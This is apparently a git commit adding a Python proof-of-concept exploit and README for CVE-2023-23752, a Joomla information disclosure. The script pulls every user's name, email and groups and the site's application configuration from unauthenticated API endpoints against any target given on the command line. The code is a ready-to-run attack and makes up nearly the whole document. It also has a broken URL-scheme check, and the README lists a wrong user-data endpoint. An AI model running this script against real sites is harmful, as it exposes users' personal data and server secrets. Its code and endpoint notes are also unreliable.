Reformat the repo to store all my PoCs and add CVE-2025-24893

CVE-2023-23752/CVE-2023-23752.py

@@ -0,0 +1,76 @@
+import requests
+import json
+import argparse
+
+class User:
+    def __init__(user, name, email, lastvisitDate, groupNames):
+        user.name = name
+        user.email = email
+        user.lastvisitDate = lastvisitDate
+        user.groupNames = groupNames
+    
+    def __str__(user):
+        return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}"
+
+def vulnCheck(tgt):
+    verUrl = tgt + "/administrator/manifests/files/joomla.xml"
+    verData = requests.get(verUrl)
+    if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower():
+        print("[-] Site does not appear to be vulnerable!")
+        raise SystemExit
+
+def getUsers(tgt):
+    usrUrl = tgt + "/api/index.php/v1/users?public=true"
+    usrData = requests.get(usrUrl)
+    if "404" in usrData.text.lower() or "403" in usrData.text.lower():
+        print("[-] Error fetching user data, site may not be vulnerable")
+        raise SystemExit
+    parsedUsrs = json.loads(usrData.text)
+    return parsedUsrs
+
+def parseUsers(usrData):
+    users = []
+    for user in usrData["data"]:
+        userAtribs = user["attributes"]
+        newUser = User(userAtribs["username"],
+                       userAtribs["email"],
+                       userAtribs["lastvisitDate"],
+                       userAtribs["group_names"] )
+        users.append(newUser)
+    return users
+
+def getConfig(tgt):
+    cfgUrl = tgt + "/api/index.php/v1/config/application?public=true"
+    cfgData = requests.get(cfgUrl)
+    if "404" in cfgData.text.lower() or "403" in cfgData.text.lower():
+        print("[-] Error fetching user data, site may not be vulnerable")
+        raise SystemExit
+    parsedCfg = json.loads(cfgData.text)
+    return parsedCfg
+
+    
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo')
+    parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
+    args = parser.parse_args()
+
+    tgt = args.target.lower()
+
+    if tgt[4] != "http" and tgt[5] != "https":
+        print("[*] No URL schema specified, defaulting to HTTP")
+        tgt = "http://" + tgt
+
+    vulnCheck(tgt)
+
+    print(f"\n[+] User data found!") 
+    print("----------")
+    for user in parseUsers(getUsers(tgt)):
+        print(user)
+        print("----------")
+    
+    print(f"\n[+] Config data found!")
+    print("----------")
+    for i in getConfig(tgt)["data"]:
+        print(i["attributes"])
+

CVE-2023-23752/README.md

@@ -0,0 +1,27 @@
+# CVE-2023-23752 - Joomla Information Disclosure
+
+Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby...
+
+I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick".
+
+---
+This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints:
+
+#### User Info
+
+`/api/index.php/v1/config/applicaton?public=true`
+
+#### Config Info
+
+`/api/index.php/v1/config/application?public=true"`
+
+## Usage
+`python3 CVE-2023-23752.py -t <target_url>`
+
+---
+
+
+# License
+GPL v3.0 - as all good software should be
+
+Remember - don't be a skid :)